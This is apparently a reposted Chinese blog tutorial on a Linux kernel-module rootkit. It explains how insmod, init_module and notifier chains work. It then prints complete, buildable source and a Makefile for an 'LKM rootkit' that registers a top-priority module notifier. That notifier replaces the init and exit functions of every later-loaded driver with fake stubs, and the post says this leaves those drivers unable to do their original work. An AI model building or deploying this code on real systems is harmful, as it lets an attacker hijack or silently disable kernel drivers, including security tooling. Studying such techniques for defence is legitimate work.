devbox
菜鸟追梦旅行
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

Rootkit---HOOK内核驱动_内核地址驱动hook源码例子

作者:菜鸟追梦旅行 | 2024-03-03 19:49:09

内核地址驱动hook源码例子

当插入一个内核驱动时,一般会使用工具insmod,该工具实际上调用了系统调用init_module,在该系统调用函数中,首先调用 load_module,把用户空间传入的整个内核模块文件创建成一个内核模块,返回一个struct module结构体。内核中便以这个结构体代表这个内核模块。

  1. init_module系统调用定义,可以看到主要是调用了load_module。
    在这里插入图片描述
  2. 在load_module中,主要prepare_coming_module,准备将内核模块进行加载。
    在这里插入图片描述
  3. prepare_coming_module中经过一系列的调用,最终执行到notifier_call_chain函数,并且执行了notifier_call回调函数,notifier_call就是需要hook的函数。
    在这里插入图片描述
    我们注册的通知链处理函数是在 notifier_call_chain函数里被调用的,调用层次为: blocking_notifier_call_chain ->__blocking_notifier_call_chain -> notifier_call_chain 。

HOOK内核驱动:

  1. Notifier chains通过注册的函数调用来通知异步事件或状态。注册或者注销模块通知处理函数可以使用 register_module_notifier 或者unregister_module_notifier 函数。
struct notifier_block nb = {
    .notifier_call = module_notifier,
    .priority = INT_MAX
};

  • 1
  • 2
  • 3
  • 4
  1. MODULE_STATE_COMING:模块当前正在被加载。MODULE_STATE_LIVE:模块当前正常使用中(存活状态)。MODULE_STATE_GOING:模块当前正在被卸载。
int module_notifier(struct notifier_block *nb, unsigned long action, void *data)
{
    struct module *module;
    unsigned long flags;
	/*声明一个自旋锁x并初始化它*/
    DEFINE_SPINLOCK(module_notifier_spinlock);

    module = data;
	/*自旋锁*/
    spin_lock_irqsave(&module_notifier_spinlock, flags);
    switch (module->state) {
		case MODULE_STATE_COMING:
			printk("Kernel Module: %s\n", module->name);
			/*将初始化和退出函数换成自定义的函数*/
			module->init = hook_init;
			module->exit = hook_exit;
			break;
		default:
			break;
    }
	/*解锁*/
    spin_unlock_irqrestore(&module_notifier_spinlock, flags);

    return NOTIFY_DONE;
}

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  1. 加载HOOK内核驱动。
    在这里插入图片描述
  2. 加载其他驱动,可以看到打印了Fake init和加载的模块名,证明已经hook成功。
    在这里插入图片描述
  3. 虽然其他的内核驱动已经正常加载进去了,但是也是无法正常原本的功能。
    在这里插入图片描述
    源码:
# include <linux/module.h>
# include <linux/kernel.h>
# include <linux/notifier.h>

int  hook_init(void);
void hook_exit(void);

int module_notifier(struct notifier_block *nb, unsigned long action, void *data);

struct notifier_block nb = {
    .notifier_call = module_notifier,
    .priority = INT_MAX
};


int init_my_module(void)
{
    printk("init_my_module!\n");
	/*注册notifier_block,函数用于注册需要知道当前模块的状态,然后触发一个回调函数*/
    int ret = register_module_notifier(&nb);
	if(ret){
		printk("Failed to register tracepoint module enter notifier\n");
		return -1;
	}
	printk("module name: %s\n",  THIS_MODULE->name);
	printk("module state: %d\n", THIS_MODULE->state);
    return 0;
}


void exit_my_module(void)
{
    unregister_module_notifier(&nb);
    printk("exit_my_module!\n");
    return;
}


int module_notifier(struct notifier_block *nb, unsigned long action, void *data)
{
    struct module *module;
    unsigned long flags;
	/*声明一个自旋锁x并初始化它*/
    DEFINE_SPINLOCK(module_notifier_spinlock);

    module = data;
	/*自旋锁*/
    spin_lock_irqsave(&module_notifier_spinlock, flags);
    switch (module->state) {
		case MODULE_STATE_COMING:
			printk("Kernel Module: %s\n", module->name);
			/*将初始化和退出函数换成自定义的函数*/
			module->init = hook_init;
			module->exit = hook_exit;
			break;
		default:
			break;
    }
	/*解锁*/
    spin_unlock_irqrestore(&module_notifier_spinlock, flags);

    return NOTIFY_DONE;
}

int hook_init(void)
{
    printk("Fake init\n");
    return 0;
}

void hook_exit(void)
{
    printk("Fake exit\n");

    return;
}

module_init(init_my_module);
module_exit(exit_my_module);

MODULE_LICENSE("Dual BSD/GPL");
MODULE_AUTHOR("lkm");
MODULE_DESCRIPTION("LKM rootkit");

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60
  • 61
  • 62
  • 63
  • 64
  • 65
  • 66
  • 67
  • 68
  • 69
  • 70
  • 71
  • 72
  • 73
  • 74
  • 75
  • 76
  • 77
  • 78
  • 79
  • 80
  • 81
  • 82
  • 83

Makefile:

KVERS = $(shell uname -r)
obj-m += kernelLoad.o
#EXTRA_CFLAGS = -g -O0
build: kernel_modules
kernel_modules:
	make -C /lib/modules/$(KVERS)/build M=$(CURDIR) modules
clean:
	make -C /lib/modules/$(KVERS)/build M=$(CURDIR) clean

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

参考:
https://0xax.gitbooks.io/linux-insides/content/Concepts/linux-cpu-4.html
https://www.opensourceforu.com/2009/01/the-crux-of-linux-notifier-chains/
https://www.cnblogs.com/sky-heaven/p/4554614.html
https://blog.csdn.net/damontive/article/details/18313729
https://www.cnblogs.com/likaiming/p/11002351.html

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/185453
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号